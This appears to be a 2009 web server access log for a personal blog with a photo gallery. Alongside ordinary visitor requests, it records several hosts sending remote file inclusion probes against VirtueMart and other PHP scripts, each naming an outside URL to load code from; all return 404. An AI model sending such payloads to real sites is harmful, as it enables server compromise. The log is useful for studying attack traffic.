64.34.172.201 - - [02/Apr/2009:11:08:18 -0700] "GET /logs/access_080530.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.172.201 - - [02/Apr/2009:11:08:20 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.172.201 - - [02/Apr/2009:11:08:22 -0700] "GET /logs/access_080530.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.172.201 - - [02/Apr/2009:11:08:25 -0700] "GET /logs/access_080530.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:08:28 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:08:28 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:08:28 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:08:37 -0700] "GET /xfgiichiaaabgdkki.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:08:43 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [02/Apr/2009:11:08:44 -0700] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.50 - - [02/Apr/2009:11:08:48 -0700] "GET /logs/access_080905.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.31.50 - - [02/Apr/2009:11:08:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.31.50 - - [02/Apr/2009:11:08:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:06 -0700] "GET / HTTP/1.1" 200 105656 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:11:09:06 -0700] "GET /logs/access_080424.log%20%20/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:06 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 10174 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:06 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.6 HTTP/1.1" 200 31111 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:06 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/admin/js/swfobject.js?ver=2.1 HTTP/1.1" 200 9763 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:06 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1-20090123 HTTP/1.1" 200 12101 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:06 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.1" 200 5715 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:06 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20081210 HTTP/1.1" 200 3864 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:08 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:08 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:11:09:11 -0700] "GET /logs/access_090102.log%20%20/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:11:09:13 -0700] "GET /logs/access_080424.log%20%20/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:17 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_002.jpg HTTP/1.1" 200 440569 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:17 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_011.jpg HTTP/1.1" 200 538879 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:17 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_005.jpg HTTP/1.1" 200 482543 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:17 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_008.jpg HTTP/1.1" 200 477981 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:17 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_022.jpg HTTP/1.1" 200 536116 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:17 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_010-2.jpg HTTP/1.1" 200 750495 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
218.27.203.107 - - [02/Apr/2009:11:09:17 -0700] "GET /logs/access_090102.log%20%20/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:19 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:19 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:19 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:19 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:19 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:19 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:20 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:20 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:20 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:20 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_020.jpg HTTP/1.1" 200 429248 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:21 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:21 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_021.jpg HTTP/1.1" 200 401164 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:22 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:22 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:22 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_025.jpg HTTP/1.1" 200 619493 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:23 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_027.jpg HTTP/1.1" 200 573032 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:23 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_026.jpg HTTP/1.1" 200 724302 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:24 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:26 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:26 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:27 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_028.jpg HTTP/1.1" 200 698735 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:27 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_030.jpg HTTP/1.1" 200 688421 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:27 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_031.jpg HTTP/1.1" 200 710017 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:28 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:29 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_032.jpg HTTP/1.1" 200 759951 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:29 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_015-2.jpg HTTP/1.1" 200 456408 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:32 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:32 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:33 -0700] "GET /logs/access_080530.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:34 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_040.jpg HTTP/1.1" 200 550942 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:34 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_042.jpg HTTP/1.1" 200 583082 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:34 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_041.jpg HTTP/1.1" 200 592706 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:35 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:35 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_043.jpg HTTP/1.1" 200 344655 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:36 -0700] "GET /logs/access_080530.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:37 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_044.jpg HTTP/1.1" 200 441745 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:38 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:38 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:38 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:38 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_045.jpg HTTP/1.1" 200 434634 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:38 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_048.jpg HTTP/1.1" 200 509138 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
80.245.60.162 - - [02/Apr/2009:11:09:38 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:39 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_050.jpg HTTP/1.1" 200 323069 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:39 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:40 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_054.jpg HTTP/1.1" 200 272244 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:40 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:40 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_055.jpg HTTP/1.1" 200 283393 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
